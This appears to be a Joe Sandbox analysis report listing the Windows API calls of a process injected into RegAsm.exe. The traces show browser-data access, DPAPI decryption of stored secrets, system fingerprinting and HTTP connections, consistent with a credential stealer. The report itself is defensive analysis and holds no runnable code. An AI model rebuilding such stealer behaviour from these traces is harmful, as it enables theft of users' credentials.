Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012B2D20), ref: 00418CDD
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDE58), ref: 00418CF6
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDFC0), ref: 00418D0E
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDE88), ref: 00418D26
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDFF0), ref: 00418D3F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012B4048), ref: 00418D57
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDED0), ref: 00418D6F
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDD08), ref: 00418D88
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDF00), ref: 00418DA0
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDF18), ref: 00418DB8
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012B2D40), ref: 00418DD1
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012B2980), ref: 00418DE9
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012B2760), ref: 00418E01
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012B26C0), ref: 00418E1A
Part of subcall function 00418CB0: GetProcAddress.KERNEL32(74DD0000,012BDF60), ref: 00418E32

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,012BF260,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181D6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181F0

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

Part of subcall function 00404490: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
Part of subcall function 00404490: StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 00412870: StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
Part of subcall function 00412870: ExitProcess.KERNEL32 ref: 004128B3

Part of subcall function 00405C90: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
Part of subcall function 00405C90: StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 004122F0: strtok_s.MSVCRT ref: 00412330

Sleep.KERNEL32(000003E8), ref: 004185E9

Part of subcall function 00405C90: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04

Part of subcall function 00413930: strtok_s.MSVCRT ref: 0041396C
Part of subcall function 00413930: strtok_s.MSVCRT ref: 004139AE

Part of subcall function 00411DF0: memset.MSVCRT ref: 00411E2B

Part of subcall function 00405C90: HttpOpenRequestA.WININET(00000000,012BF810,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00405F44
Part of subcall function 00405C90: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Strings

%, xrefs: 0041881A

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepSystemTimeVolumeWindowsmemset
String ID: %
API String ID: 3292282700-2567322570
Opcode ID: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction ID: a80d5cc082a79b13c4afddcc74089088984bc40af4cfd8f7e2f84988951bca03
Opcode Fuzzy Hash: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction Fuzzy Hash: E9428F70D10358EADF10EBA5C946BDDBBB4AF19308F5041AEF54573282DB781B48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004171B0 Relevance: 7.6, APIs: 5, Instructions: 148registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004171F1
RegOpenKeyExA.KERNEL32(80000001,012C2A20,00000000,00020119,00422FC0), ref: 00417210
RegQueryValueExA.ADVAPI32(00422FC0,012C3440,00000000,00000000,?,000000FF), ref: 00417234
lstrcat.KERNEL32(?,?), ref: 00417263
lstrcat.KERNEL32(?,012C35A8), ref: 00417277

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValuememset
String ID:
API String ID: 558315959-0
Opcode ID: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction ID: 74d8b735119c2182752737772a63e4f349c5be27bf2cba7256ea7a55185fa83a
Opcode Fuzzy Hash: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction Fuzzy Hash: 8F51E370940208ABCB18EFA0CC46FEE7779AB49704F10855EF61967281DB746A89CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00410FF0 Relevance: 7.6, APIs: 5, Instructions: 70commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
SysAllocString.OLEAUT32(?), ref: 0041101C
_wtoi64.MSVCRT ref: 00411062
SysFreeString.OLEAUT32(?), ref: 00411078
SysFreeString.OLEAUT32(00000000), ref: 0041107B

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction ID: 0243a214321a8e11e6d6ada038f83521d736f052b3ccf67aedd98e01bceb802f
Opcode Fuzzy Hash: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction Fuzzy Hash: 72117275B00118AFC710DFA9CC84DAA7BB9EFC9344B1481AAE605C7320DA35EE81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 19A6FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 19A6FE03

Strings

winRead, xrefs: 19A6FE3D
delayed %dms for lock/sharing conflict at line %d, xrefs: 19A6FE78

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: a454f74b2fa52198079139c7bdd4cd6d455b4f6d5f7bd0eb3f67dace1f504d29
Instruction ID: 75192a5cf68defb7116c023e9cdda4ba9086735d39f2c056fd38b39507bca028
Opcode Fuzzy Hash: a454f74b2fa52198079139c7bdd4cd6d455b4f6d5f7bd0eb3f67dace1f504d29
Instruction Fuzzy Hash: E241E672604355ABC304DE64CD819ABB7EDFF84A14FC8192DF944C7660E721F91C87A2

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF50 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,012C3008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB

Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

memcmp.MSVCRT ref: 0040CFF9

Part of subcall function 00406F90: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
Part of subcall function 00406F90: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
Part of subcall function 00406F90: LocalFree.KERNEL32(?), ref: 00406FEE

Strings

, xrefs: 0040D024
DPAPI, xrefs: 0040CFF3

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 512175977-1819349886
Opcode ID: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction ID: 04e0419f88c9d5c658d70bb4a20b994614d1a13e8e8d8d930ac63f7b7d88e2a3
Opcode Fuzzy Hash: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction Fuzzy Hash: 3E3193B1D001099BCB10DF95DC42FEFB779AB84318F14422AE915B32C2EA395A49C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00410530 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
HeapAlloc.KERNEL32(00000000), ref: 0041054C
RegOpenKeyExA.KERNEL32(80000002,012BB548,00000000,00020119,00000000), ref: 0041056B
RegQueryValueExA.KERNEL32(00000000,012C2B00,00000000,00000000,00000000,000000FF), ref: 00410586

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction ID: 6759878f835c56c9ca0f427d276befcc344c5531ee7d20c41334848b2fd0dccc
Opcode Fuzzy Hash: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction Fuzzy Hash: 0CF04FB9640209BFD714DBA0DC59FAB7BBEEB45B41F105159BA0597250D6709900CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040E510 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 488COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,Opera GX,00427AE6,00427AE3,?,?), ref: 0040E56D

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,012C3008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9

Strings

Opera GX, xrefs: 0040E556
$, xrefs: 0040EB1E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID: $$Opera GX
API String ID: 1439182418-3699434461
Opcode ID: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction ID: 17207a86614afdb77cff5a3d56c68c7749fc063a50330c9fb849252114e4ac69
Opcode Fuzzy Hash: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction Fuzzy Hash: 99128F71911248EACB14EBE5C945BEDBBB8AF19304F14817EF90573286DB781B0CC7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004140D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 00414100
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004141CF

Strings

ERROR, xrefs: 004141C9

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: ERROR
API String ID: 1659193697-2861137601
Opcode ID: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction ID: 7a4a8b2ae2701fe1ed20729628e627548499ab356697860d70efb29cd96e5671
Opcode Fuzzy Hash: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction Fuzzy Hash: 8341B6B1900244FFCB00EFA9D846BDE7BB4AB19354F10812EF505A7281DB389648CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00413D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,012BF690,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,012C3470,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

Strings

ERROR, xrefs: 00413DA3
ERROR, xrefs: 00413E0E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
String ID: ERROR$ERROR
API String ID: 1815705353-2579291623
Opcode ID: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction ID: 2de14b8495628cd286d50378bf444954eaaf3636dd8b2d3ca14243e0d5a7f802
Opcode Fuzzy Hash: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction Fuzzy Hash: 99414F30914289DADB10EBA5C5057DDBBE8AF19308F5041AEF905636C2DFB81B08C7F6

Uniqueness

Uniqueness Score: -1.00%

Function 00411A40 Relevance: 4.5, APIs: 3, Instructions: 31COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
CloseHandle.KERNEL32(00000000), ref: 00411A7E

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction ID: 660ba3e5b87f2d6f46484b434598976fca83c63f4e6e6eb2b951d01fded5b4af
Opcode Fuzzy Hash: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction Fuzzy Hash: AAF0273560112867D720AB44CC05FDE77689F05700F000194FF48AB2D0DBB05EC487D4

Uniqueness

Uniqueness Score: -1.00%

Function 004102C0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,012B2F20,0041887F), ref: 004102CC
HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,012B2F20,0041887F), ref: 004102D3
GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction ID: 406b522a559848795045bf452203491930279dbdd2025bb65e998ac759834946
Opcode Fuzzy Hash: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction Fuzzy Hash: 68E08CB5741229ABD3109BE9AC0DBDBBAEDDB06B51F501196BB04D3240EAF08D0087E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401050 Relevance: 4.5, APIs: 3, Instructions: 19stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,012B2F20,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,012B2F20,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

strcmp.MSVCRT ref: 0040105C

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 00410293
